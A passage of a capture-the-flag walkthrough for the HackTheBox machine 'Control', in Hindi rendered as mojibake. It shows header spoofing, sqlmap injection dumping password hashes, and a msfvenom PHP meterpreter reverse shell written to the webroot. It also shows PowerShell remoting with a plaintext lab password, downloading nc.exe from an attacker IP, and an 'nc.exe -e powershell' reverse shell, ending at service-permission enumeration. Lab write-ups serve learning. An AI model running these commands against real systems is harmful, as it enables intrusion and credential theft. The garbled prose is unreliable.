Get best of the week

рдмреЙрдХреНрд╕ рдХреЛ рд╣реИрдХ рдХрд░реЗрдВред рдкреИрд╕реЗрдЬ рдХрдВрдЯреНрд░реЛрд▓ред SQL рдЗрдВрдЬреЗрдХреНрд╢рди рдФрд░ LPE рд╕реЗрд╡рд╛ рдЕрдзрд┐рдХрд╛рд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ

рдЫрд╡рд┐

рдореИрдВ HackTheBox рд╕рд╛рдЗрдЯ рд╕реЗ рдЖрдЧреЗ рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗ рд▓рд┐рдП рднреЗрдЬреЗ рдЧрдП рд╕рдорд╛рдзрд╛рди рдкреНрд░рдХрд╛рд╢рд┐рдд рдХрд░рдирд╛ рдЬрд╛рд░реА рд░рдЦрддрд╛ рд╣реВрдВ ред

рдЗрд╕ рд▓реЗрдЦ рдореЗрдВ, рд╣рдо рдПрд╕рдХреНрдпреВрдПрд▓ рдЗрдВрдЬреЗрдХреНрд╢рди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдкреНрд░рд╡реЗрд╢ рдХрд░рддреЗ рд╣реИрдВ, рдХрдорд╛рдВрдб рд▓рд╛рдЗрди рдХреЗ рдЗрддрд┐рд╣рд╛рд╕ рдореЗрдВ рддрд▓реНрд▓реАрди рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рд╕реЗрд╡рд╛ рдХреЗ рдЕрдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд▓рд┐рдП рд╣рдорд╛рд░реЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рдзрдиреНрдпрд╡рд╛рдж рдХрд░рддреЗ рд╣реИрдВред

рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ рдХрд╛ рдХрдиреЗрдХреНрд╢рди рд╡реАрдкреАрдПрди рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реИред рдпрд╣ рд╕рд▓рд╛рд╣ рджреА рдЬрд╛рддреА рд╣реИ рдХрд┐ рдПрдХ рдХрд╛рд░реНрдп рдХрдВрдкреНрдпреВрдЯрд░ рдпрд╛ рдХрд┐рд╕реА рд╣реЛрд╕реНрдЯ рд╕реЗ рдХрдиреЗрдХреНрдЯ рди рдХрд░реЗрдВ рдЬрд╣рд╛рдВ рдЖрдкрдХреЗ рд▓рд┐рдП рдорд╣рддреНрд╡рдкреВрд░реНрдг рдбреЗрдЯрд╛ рдЙрдкрд▓рдмреНрдз рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдЖрдк рдЙрди рд▓реЛрдЧреЛрдВ рдХреЗ рд╕рд╛рде рдПрдХ рдирд┐рдЬреА рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ рдЖрддреЗ рд╣реИрдВ рдЬреЛ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рдХреНрд╖реЗрддреНрд░ рдореЗрдВ рдХреБрдЫ рдЬрд╛рдирддреЗ рд╣реИрдВ :)

рд╕рдВрдЧрдардирд╛рддреНрдордХ рдЬрд╛рдирдХрд╛рд░реА
, , Telegram . , , .

. , - , .

рдЯреЛрд╣


рдЗрд╕ рдорд╢реАрди рдХрд╛ рдЖрдИрдкреА рдПрдбреНрд░реЗрд╕ 10.10.10.167 рд╣реИ, рдЬрд┐рд╕реЗ рдореИрдВ / etc / рдореЗрдЬрдмрд╛рдиреЛрдВ рдореЗрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реВрдБред

10.10.10.167    control.htb

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рд╣рдо рдЦреБрд▓реЗ рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рддреЗ рд╣реИрдВред рдЪреВрдВрдХрд┐ рдиреИрдореНрдк рдХреЗ рд╕рд╛рде рд╕рднреА рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдХреЛ рд╕реНрдХреИрди рдХрд░рдиреЗ рдореЗрдВ рд▓рдВрдмрд╛ рд╕рдордп рд▓рдЧрддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рдореИрдВ рдЗрд╕реЗ рдкрд╣рд▓реЗ рдореИрд╕рдХреИрди рдХреЗ рд╕рд╛рде рдХрд░реВрдВрдЧрд╛ред рд╣рдо 1000 рдкреИрдХреЗрдЯ рдкреНрд░рддрд┐ рд╕реЗрдХрдВрдб рдХреА рдЧрддрд┐ рд╕реЗ tun0 рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рд╕реЗ рд╕рднреА рдЯреАрд╕реАрдкреА рдФрд░ рдпреВрдбреАрдкреА рдкреЛрд░реНрдЯ рдХреЛ рд╕реНрдХреИрди рдХрд░рддреЗ рд╣реИрдВред

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.167   --rate=1000

рдЫрд╡рд┐

рдЕрдм, рдмрдВрджрд░рдЧрд╛рд╣реЛрдВ рдкрд░ рдХрд╛рдо рдХрд░рдиреЗ рд╡рд╛рд▓реА рд╕реЗрд╡рд╛рдУрдВ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЕрдзрд┐рдХ рд╡рд┐рд╕реНрддреГрдд рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд▓рд┐рдП, рд╣рдо -рдП рд╡рд┐рдХрд▓реНрдк рдХреЗ рд╕рд╛рде рдПрдХ рд╕реНрдХреИрди рдЪрд▓рд╛рдПрдВрдЧреЗред
nmap -A control.htb -p80,135,3306,49667,49666

рдЫрд╡рд┐

рд╣реЛрд╕реНрдЯ рдПрдХ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдЪрд▓рд╛ рд░рд╣рд╛ рд╣реИред рдЖрдЗрдпреЗ рджреЗрдЦрддреЗ рд╣реИрдВ рдХреНрдпрд╛ рд╣реИред

рдЫрд╡рд┐

рдФрд░ рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкреИрдирд▓ рдХреЗ рд▓рд┐рдП рдПрдХ рд▓рд┐рдВрдХ рд╣реИред рд▓реЗрдХрд┐рди рд╣рдореЗрдВ рд╕реВрдЪрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдХрд┐ рдХреЛрдИ рд╣реЗрдбрд░ рдирд╣реАрдВ рд╣реИ рдФрд░ рд╣рдореЗрдВ рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рдВрдкрд░реНрдХ рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдПред

рдЫрд╡рд┐

рдЙрд╕реА рд╕рдордп, рдкреНрд░рд╛рд░рдВрдн рдкреГрд╖реНрда рдХреЗ рд╕реНрд░реЛрдд рдХреЛрдб рдореЗрдВ рд╣рдореЗрдВ рд╕рдВрджреЗрд╢ рдорд┐рд▓рддрд╛ рд╣реИ:

рдЫрд╡рд┐

рдЖрдкрдХреЛ рдЬрд┐рд╕ рдкреНрд░реЙрдХреНрд╕реА рдФрд░ рдкрддреЗ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ рдЙрд╕рдХреА рддреБрд▓рдирд╛ рдХрд░рддреЗ рд╣реБрдП, рд╣рдо рдорд╛рдирддреЗ рд╣реИрдВ рдХрд┐ рдЖрдкрдХреЛ рдЗрд╕рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЬрд╛рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдкреНрд░реЙрдХреНрд╕реА рдХреЛ HTTP рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдореЗрдВ x рдЕрдЧреНрд░рд╕рд╛рд░рд┐рдд-рд╣реЗрдбрд░ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЪрд▓рд┐рдП рдЗрд╕реЗ рдмреЗрдирдХрд╛рдм рдХрд░рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдФрд░ рд╣рдо рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкреГрд╖реНрда рдкрд░ рдЬрд╛рддреЗ рд╣реИрдВред рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдЪрд▓рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рд▓реЗрдХрд┐рди рдЬрдм рдЖрдк рдХреБрдЫ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рд╡реЗ рд╣рдореЗрдВ рдПрдХ рдкреНрд░реЙрдХреНрд╕реА рд╕рдВрджреЗрд╢ рд╡рд╛рд▓реЗ рдкреГрд╖реНрда рдкрд░ рдлреЗрдВрдХ рджреЗрдВрдЧреЗред рдРрд╕рд╛ рдЗрд╕рд▓рд┐рдП рд╣реИ рдХреНрдпреЛрдВрдХрд┐ рд╣рдо рдкрд╛рдП рдЧрдП рд╣реЗрдбрд░ рдХреЛ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдирд╣реАрдВ рдХрд░ рд░рд╣реЗ рд╣реИрдВред рдкреНрд░реЙрдХреНрд╕реА -> рд╡рд┐рдХрд▓реНрдк рдЯреИрдм рдореЗрдВ, рдпрд╣ рд╣рд░ рдмрд╛рд░ рдмрд░реНрдк рд╕реВрдЯ рдореЗрдВ рдирд╣реАрдВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдо "рдорд┐рд▓рд╛рди рдФрд░ рдмрджрд▓реЗрдВ" рдлрд╝рдВрдХреНрд╢рди рдХреЛ рдвреВрдВрдврддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдФрд░ рдПрдХ рдирдИ рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐ рдЬреЛрдбрд╝реЗрдВ рдЬреЛ рдЗрд╕ рд╣реЗрдбрд░ рдХреЛ рд╕рднреА рдЖрдЙрдЯрдЧреЛрдЗрдВрдЧ рдЕрдиреБрд░реЛрдзреЛрдВ рдореЗрдВ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ рдЬреЛрдбрд╝ рджреЗрдЧрд╛ред

рдЫрд╡рд┐

рдФрд░ рдЦреЛрдЬ рдХреНрд╖реЗрддреНрд░ рдХрд╛ рдкрд░реАрдХреНрд╖рдг рдХрд░рдиреЗ рдкрд░ рд╣рдореЗрдВ SQL рдЗрдВрдЬреЗрдХреНрд╢рди рд▓рдЧрддрд╛ рд╣реИред

рдЫрд╡рд┐

рдСрдкрд░реЗрд╢рди рдХреЗ рд▓рд┐рдП рд╣рдо sqlmap рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рдЖрдЗрдП рдЗрд╕ рдЕрдиреБрд░реЛрдз рдХреЛ рдПрдХ рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рд╕рд╣реЗрдЬреЗрдВ (рдХреЙрдкреА рдЯреВ рдлрд╝рд╛рдЗрд▓) рдФрд░ рдЗрд╕ рдлрд╝рд╛рдЗрд▓ рдХреЛ рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд░реВрдк рдореЗрдВ рдкрд╛рд╕ рдХрд░рддреЗ рд╣реБрдП, sqlmap рдЪрд▓рд╛рдПрдВред
sqlmap -r headers.req

рдЫрд╡рд┐

рдкреНрд░рд╡реЗрд╢ рдмрд┐рдВрджреБ
рдЖрдЗрдП рджреЗрдЦреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдбреЗрдЯрд╛рдмреЗрд╕ рдЙрдкрд▓рдмреНрдз рд╣реИрдВред
sqlmap -r headers.req --dbs

рдЫрд╡рд┐

рдЖрдЗрдП рдЬрд╛рдиреЗрдВ рдХрд┐ рдХреНрдпрд╛ рдкреНрд░рдорд╛рдг рдЙрдкрд▓рдмреНрдз рд╣реИрдВред рдЖрдЗрдП mysql рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ рд╕рднреА рддрд╛рд▓рд┐рдХрд╛рдУрдВ рдХреЛ рджреЗрдЦреЗрдВред
sqlmap -r headers.req -D mysql --tables

рдЫрд╡рд┐

рдЗрд╕рд▓рд┐рдП рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рддрд╛рд▓рд┐рдХрд╛ рдореЗрдВ рд░реБрдЪрд┐ рд░рдЦрддреЗ рд╣реИрдВред рд╕рднреА рдХреЙрд▓рдо рдХреЗ рдирд╛рдо рдорд┐рд▓рддреЗ рд╣реИрдВред
sqlmap -r headers.req -D mysql -T user --columns

рдЫрд╡рд┐

рд╕рднреА рд╕реНрддрдВрднреЛрдВ рдореЗрдВ, рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рд╣реИрдВред рд╣рдо рд╕реАрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдЙрдирдореЗрдВ рдХреНрдпрд╛ рд╣реИред
sqlmap -r headers.req -D mysql -T user -C User,Password --dump

рдЫрд╡рд┐

рдбреЗрдЯрд╛рдмреЗрд╕ рдореЗрдВ рдХрдИ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИрдВред Sqlmap hashes рджрд░рд╛рд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред рд╣рдо рдПрдХ рд╢рдмреНрджрдХреЛрд╢ рд╣рдорд▓реЗ рдХрд╛ рдЪрдпрди рдХрд░рддреЗ рд╣реИрдВ, рдЗрдВрдЧрд┐рдд рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рд╣рдо рдЕрдкрдиреЗ рд╢рдмреНрджрдХреЛрд╢ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВ рдФрд░ рдЪрдЯреНрдЯрд╛рдиреА рдХреЗ рд▓рд┐рдП рд░рд╛рд╕реНрддрд╛ рд▓рд┐рдЦрдирд╛ рдЪрд╛рд╣рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдХреБрдЫ рд╕реЗрдХрдВрдб рдХреЗ рдмрд╛рдж, рд╣рдореЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдФрд░ рдЙрдирдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХреЗ рд╕рд╛рде рдПрдХ рддрд╛рд▓рд┐рдХрд╛ рдкреНрд░рджрд╛рди рдХреА рдЬрд╛рдПрдЧреАред рдпрджрд┐ sqlmap рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдореЗрдВ рд╕рдХреНрд╖рдо рдерд╛, рддреЛ рдпрд╣ рдХреЛрд╖реНрдардХ рдореЗрдВ рд╣реИрд╢ рдХреЗ рдмрдЧрд▓ рдореЗрдВ рдЗрдВрдЧрд┐рдд рдХрд░реЗрдЧрд╛ред рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реЗрдХреНрдЯрд░ рдХреА рд╕рд╛рдЦ рд╣реИред

рдЫрд╡рд┐

рдореБрдЭреЗ sqlmap рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╢реЗрд▓ рдирд╣реАрдВ рдорд┐рд▓ рд╕рдХрд╛, рд▓реЗрдХрд┐рди рдлрд╛рдЗрд▓реЛрдВ рдХреЛ рд▓рд┐рдЦрдирд╛ред рдЪрд▓рд┐рдП рд╡реЗрдм рдкреЛрд╕реНрдЯ рдХрд░рддреЗ рд╣реИрдВред рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ, рд╣рдо PHP рдкреНрд░рд╛рд░реВрдк рдореЗрдВ рдореАрдЯрд░рдкрд░реЗрдЯрд░ рд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░рддреЗ рд╣реИрдВред
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.15.82 LPORT=4321 -f raw > r.php
cat r.php | xclip -selection clipboard && echo '<?php ' | tr -d '\n' > r.php && xclip -selection clipboard -o >> r.php


рдЕрдм рдЗрд╕реЗ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдореЗрдВ sqlmap рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд▓рд┐рдЦреЗрдВред
sqlmap -r headers.req --file-write=/home/ralf/tmp/r.php --file-dest=C:/inetpub/wwwroot/r.php

рдЫрд╡рд┐

рдлрд╝рд╛рдЗрд▓ рд╕рдлрд▓рддрд╛рдкреВрд░реНрд╡рдХ рд▓рд┐рдЦреА рдЧрдИ рдереАред рд╢реНрд░реЛрддрд╛ рдЪрд▓рд╛рдЗрдПред

рдЫрд╡рд┐

рдФрд░ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрдиреА рдлрд╝рд╛рдЗрд▓ рдХреЛ рдЪрд╛рд▓реВ рдХрд░реЗрдВред
curl http://control.htb/r.php


Metasploit рд╡рд┐рдВрдбреЛ рдореЗрдВ, рд╣рдо рдПрдХ рд╕рдлрд▓ рдХрдиреЗрдХреНрд╢рди рдХрд╛ рдирд┐рд░реАрдХреНрд╖рдг рдХрд░рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЗрд╕ рд╕рддреНрд░ рдореЗрдВ рдЬрд╛рдПрдВред

рдЫрд╡рд┐

рд▓реЗрдХрд┐рди рдпрд╣рд╛рдБ рд╕рдорд╕реНрдпрд╛ рд╣реИ, рд╣рдо рд╢реЗрд▓ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдирд╣реАрдВ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдРрд╕реЗ рдкреНрд░рдпрд╛рд╕ рдХрдиреЗрдХреНрд╢рди рдХреЛ рд░реАрд╕реЗрдЯ рдХрд░рддреЗ рд╣реИрдВред рдЖрдЗрдП рдорд╛рдкрджрдВрдбреЛрдВ (-a) рдХреЗ рд░реВрдк рдореЗрдВ рд╣рдорд╛рд░реА рдХрдорд╛рдВрдб рдХреЛ рдкрд╛рд░рд┐рдд рдХрд░рдиреЗ рдХреЗ рд╕рд╛рде рджреГрд╢реНрдп (-рдПрдЪ) рд╕реЗ рдЫрд┐рдкреЗ рд╣реБрдП рдЗрдВрдЯрд░реИрдХреНрдЯрд┐рд╡ рдореЛрдб (-рдЖрдИ) рдореЗрдВ рдПрдХ рдкреЙрд╡рд░рд╢реЗрд▓ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрдирд╛рдХрд░ рд▓реЙрдХ рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВред рдЖрдЗрдП рдЬрд╛рдиреЗрдВ рдХрд┐ рд╣рдо рдХрд┐рд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рддрд╣рдд рдХрд╛рдо рдХрд░ рд░рд╣реЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛


рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╣реЗрдХреНрдЯрд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рд╣реИрдВ, рд╣рдо рдкрддрд╛ рд▓рдЧрд╛рдПрдВрдЧреЗ рдХрд┐ рдХреНрдпрд╛ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдРрд╕рд╛ рдХреЛрдИ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИред

рдЫрд╡рд┐

рдРрд╕рд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИ! рд▓реЗрдХрд┐рди рдкрд╣рд▓реЗ, рдХрд╛рд░ рдХрд╛ рдирд╛рдо рдкрддрд╛ рдХрд░реЗрдВред

рдЫрд╡рд┐

рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо, рдкрд╛рд╕рд╡рд░реНрдб, рдбреЛрдореЗрди рдФрд░ рдорд╢реАрди рдХрд╛ рдирд╛рдо рд╣реИред рдЕрдм рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдХреНрдпрд╛ рд╣рдореЗрдВ рдкреНрд░рд╛рдкреНрдд рдкреНрд░рдорд╛рдг рдЙрдкрдпреБрдХреНрдд рд╣реИрдВред рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣реЗрдХреНрдЯрд░ рдХреА рдУрд░ рд╕реЗ "whoami" рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗрдВред
execute -f powershell -a "$username = 'Control\Hector' ; $password = 'l33th4x0rhector' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername Fidelity -credential $credential -scriptblock { whoami }" -i -H

рдЫрд╡рд┐

рдареАрдХред рдЪрд▓рд┐рдП рдЦреЛрд▓ рд▓реЗрддреЗ рд╣реИрдВред рд╕реНрдерд╛рдиреАрдп рд╣реЛрд╕реНрдЯ рдкрд░ рд╡реЗрдм рд╕рд░реНрд╡рд░ рдЪрд▓рд╛рдПрдБред
python3 -m http.server 80


рдФрд░ рд╕реБрджреВрд░ Netcat рд╣реЛрд╕реНрдЯ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВред
execute -f powershell -a "$username = 'Control\Hector' ; $password = 'l33th4x0rhector' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername Fidelity -credential $credential -scriptblock { iwr 10.10.15.82/nc.exe -o C:\\Users\\Hector\\Documents\\nc.exe }" -i -H


рдЕрдм 5432 рдкреЛрд░реНрдЯ рдЦреЛрд▓реЗрдВред nc -lvp 5432 рдФрд░ рджреВрд░рд╕реНрде рд╣реЛрд╕реНрдЯ рд╕реЗ рд░рд┐рд╡рд░реНрд╕ рдХрдиреЗрдХреНрд╢рди рдХрд░реЗрдВред
execute -f powershell -a "$username = 'Control\Hector' ; $password = 'l33th4x0rhector' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername Fidelity -credential $credential -scriptblock { C:\\Users\\Hector\\Documents\\nc.exe -e powershell 10.10.15.82 5432 }" -i -H


рддреЛ рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд▓реЗрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЬрдбрд╝


рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдЬрдм рд╣рдо рдореЗрдЬрдмрд╛рди (рдЬреИрд╕реЗ рдХреЗ рд▓рд┐рдП рдореЗрдЬрдмрд╛рди рд╕реЗ рдЬрд╛рдирдХрд╛рд░реА рдПрдХрддреНрд░рд┐рдд рдХрд░ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдПрдХ рдЕрдкрд▓реЛрдб рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдЦреЛрдЬреА рдХреБрддреНрддрд╛ , PowerUp , рдЬрдмрдбрд╝реЗ , WinPEAS ), рд╣рдо рдЙрд╕ рд░рдХреНрд╖рдХ рдЙрдиреНрд╣реЗрдВ рдирд┐рдХрд╛рд▓рддрд╛ рд╣реИ рдзреНрдпрд╛рди рджреЗрдВред рд▓реЗрдХрд┐рди WinPEAS рдХрд╛ рдПрдХ рдмрд▓реНрд▓рд╛ рд╕рдВрд╕реНрдХрд░рдг рд╣реИ рдЬрд┐рд╕реЗ рдЕрдирдЗрдВрд╕реНрдЯреЙрд▓ рдирд╣реАрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рд╣рдо рдЗрд╕реЗ рд╣реЛрд╕реНрдЯ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░рддреЗ рд╣реИрдВ рдФрд░ рдЗрд╕реЗ рдЪрд▓рд╛рддреЗ рд╣реИрдВред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛ рдХреЗрд╡рд▓ рдПрдХрддреНрд░рд┐рдд рдЬрд╛рдирдХрд╛рд░реА рдХреА рд╕рд╛рд╡рдзрд╛рдиреАрдкреВрд░реНрд╡рдХ рд╕рдореАрдХреНрд╖рд╛ рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИред рдФрд░ рд╣рдо рдПрдХ рджрд┐рд▓рдЪрд╕реНрдк рдлрд╝рд╛рдЗрд▓ ConsoleHost_history.txt рдкрд╛рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рджреЗрдЦреЛ рдЗрд╕рдореЗрдВ рдХреНрдпрд╛ рд╣реИред

рдЫрд╡рд┐

рдпреЗ рдЯреАрдореЗрдВ рд╣реА рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рд╣реИрдВред Get-Acl cmdlet рдЙрди рдСрдмреНрдЬреЗрдХреНрдЯреНрд╕ рдХреЛ рдкреБрдирдГ рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ рдЬреЛ рдХрд┐рд╕реА рдлрд╝рд╛рдЗрд▓ рдпрд╛ рд╕рдВрд╕рд╛рдзрди рдХреЗ рд▓рд┐рдП рд╕реБрд░рдХреНрд╖рд╛ рдбрд┐рд╕реНрдХреНрд░рд┐рдкреНрдЯрд░ рдХрд╛ рдкреНрд░рддрд┐рдирд┐рдзрд┐рддреНрд╡ рдХрд░рддреЗ рд╣реИрдВред рд╕реБрд░рдХреНрд╖рд╛ рд╡рд┐рд╡рд░рдгрдХ рдореЗрдВ рд╕рдВрд╕рд╛рдзрди рдЕрднрд┐рдЧрдо рдирд┐рдпрдВрддреНрд░рдг рд╕реВрдЪреА (ACL) рд╣реЛрддреА рд╣реИред ACL рдореЗрдВ рд╕рдВрд╕рд╛рдзрди рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╕рдореВрд╣реЛрдВ рджреНрд╡рд╛рд░рд╛ рдЖрд╡рд╢реНрдпрдХ рдЕрдиреБрдорддрд┐рдпрд╛рдБ рд╣реИрдВред рдЗрд╕ рдкреНрд░рдХрд╛рд░, рдореИрдВрдиреЗ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ рдХрд┐ рд╕рдорд╛рдзрд╛рди рдкрде рд╕реЗрд╡рд╛рдУрдВ рдореЗрдВ рдирд┐рд╣рд┐рдд рд╣реИ рдФрд░ рдЙрди рддрдХ рдкрд╣реБрдВрдЪ рд╣реИред рдЖрдЗрдпреЗ рдЙрдирд╕реЗ рд╣реЗрдХреНрдЯрд░ рдХреА рд╕рднреА рд╕реЗрд╡рд╛рдПрдБ рдФрд░ рдЕрдиреБрдорддрд┐рдпрд╛рдВ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВред

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"


рдЖрдЙрдЯрдкреБрдЯ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рджреЗрдЦрддреЗ рд╣реБрдП, рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рд╣реЗрдХреНрдЯрд░ рдХреЗ рдкрд╛рд╕ рд╡рд┐рдВрдбреЛрдЬ рдЕрдкрдбреЗрдЯ рд╕реЗрд╡рд╛ рдХреЗ рд▓рд┐рдП рдкреВрд░реНрдг рдЕрдзрд┐рдХрд╛рд░ рд╣реИрдВ - рд╡реБрдЙрдЬрд╝рд░реНрд╡ред

рдЫрд╡рд┐

